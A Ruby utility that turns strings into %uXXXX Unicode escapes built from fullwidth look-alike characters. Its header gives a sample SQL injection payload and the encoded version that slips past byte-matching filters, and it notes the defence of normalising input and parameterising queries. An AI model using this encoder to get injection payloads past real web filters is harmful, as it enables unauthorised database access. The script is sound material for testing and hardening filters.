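# Ruby script to generate the %uXXXX ("URL-encoded Unicode") form of a string.
# Author: Gary O'leary-Steele of Sec-1 Ltd
#
# Example:
#   The string
#     ' or 1 in (@@version)--
#   is encoded as
#     %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d
#   which, per the original author, still works as the same SQL injection
#   attack once the receiving stack has decoded it.
#
# Why this matters for filtering: %uXXXX is a non-standard escape, and most of
# the code points below are look-alikes (fullwidth forms and similar) rather
# than the ASCII characters themselves. A filter or WAF rule that matches on
# the raw request bytes sees none of the original characters, so input must be
# decoded and normalised to its final form before it is validated, and the
# query itself should be parameterised rather than relying on pattern matching.

# Kept from the original file; the fallback encoder below no longer calls URI.
require 'uri'

# Character -> %uXXXX substitution table, reproduced from the original script.
# NOTE(review): '\\' shares the %u2215 mapping with '/'; confirm this is intended.
UNICODE_URL_TABLE = {
  ' ' => '%u0020', '/' => '%u2215', '\\' => '%u2215', "'" => '%u02b9',
  '"' => '%u0022', '>' => '%u003e', '<' => '%u003c', '#' => '%uff03',
  '!' => '%uff01', '$' => '%uff04', '*' => '%uff0a', '@' => '%u0040',
  '.' => '%uff0e', '_' => '%uff3f', '(' => '%uff08', ')' => '%uff09',
  ',' => '%uff0c', '%' => '%u0025', '-' => '%uff0d', ';' => '%uff1b',
  ':' => '%uff1a', '|' => '%uff5c', '&' => '%uff06', '+' => '%uff0b',
  '=' => '%uff1d',
  'a' => '%uff41', 'A' => '%uff21', 'b' => '%uff42', 'B' => '%uff22',
  'c' => '%uff43', 'C' => '%uff23', 'd' => '%uff44', 'D' => '%uff24',
  'e' => '%uff45', 'E' => '%uff25', 'f' => '%uff46', 'F' => '%uff26',
  'g' => '%uff47', 'G' => '%uff27', 'h' => '%uff48', 'H' => '%uff28',
  'i' => '%uff49', 'I' => '%uff29', 'j' => '%uff4a', 'J' => '%uff2a',
  'k' => '%uff4b', 'K' => '%uff2b', 'l' => '%uff4c', 'L' => '%uff2c',
  'm' => '%uff4d', 'M' => '%uff2d', 'n' => '%uff4e', 'N' => '%uff2e',
  'o' => '%uff4f', 'O' => '%uff2f', 'p' => '%uff50', 'P' => '%uff30',
  'q' => '%uff51', 'Q' => '%uff31', 'r' => '%uff52', 'R' => '%uff32',
  's' => '%uff53', 'S' => '%uff33', 't' => '%uff54', 'T' => '%uff34',
  'u' => '%uff55', 'U' => '%uff35', 'v' => '%uff56', 'V' => '%uff36',
  'w' => '%uff57', 'W' => '%uff37', 'x' => '%uff58', 'X' => '%uff38',
  'y' => '%uff59', 'Y' => '%uff39', 'z' => '%uff5a', 'Z' => '%uff3a',
  '0' => '%uff10', '1' => '%uff11', '2' => '%uff12', '3' => '%uff13',
  '4' => '%uff14', '5' => '%uff15', '6' => '%uff16', '7' => '%uff17',
  '8' => '%uff18', '9' => '%uff19'
}.freeze

# Characters outside this set are percent-encoded by the fallback. The set is
# the RFC 2396 reserved + unreserved characters, i.e. what URI.escape left
# untouched by default.
URI_ESCAPE_UNSAFE = %r{[^\-_.!~*'()a-zA-Z\d;/?:@&=+$,\[\]]}.freeze

# Percent-encodes a single character that has no entry in UNICODE_URL_TABLE.
def percent_encode_fallback(char)
  return char unless URI_ESCAPE_UNSAFE.match?(char)

  # One %XX (uppercase hex) per byte, so multi-byte characters expand fully.
  char.bytes.map { |byte| format('%%%02X', byte) }.join
end

# Encodes +string+ character by character using UNICODE_URL_TABLE.
#
# Characters without a table entry are percent-encoded the way the original
# URI.escape call did. URI.escape itself was removed in Ruby 3.0, so the
# original script raised NoMethodError on the first unmapped character.
#
# @param string [String] text to encode
# @return [String] the encoded text; newlines in the input are dropped
def unicode_url(string)
  # `.` does not match "\n", so the trailing newline from `gets` is discarded.
  string.scan(/./).map do |char|
    UNICODE_URL_TABLE.fetch(char) { percent_encode_fallback(char) }
  end.join
end

print "Enter string to URL Unicode:"
# `gets` returns nil at end of input; encode an empty string instead of crashing.
puts unicode_url(gets.to_s)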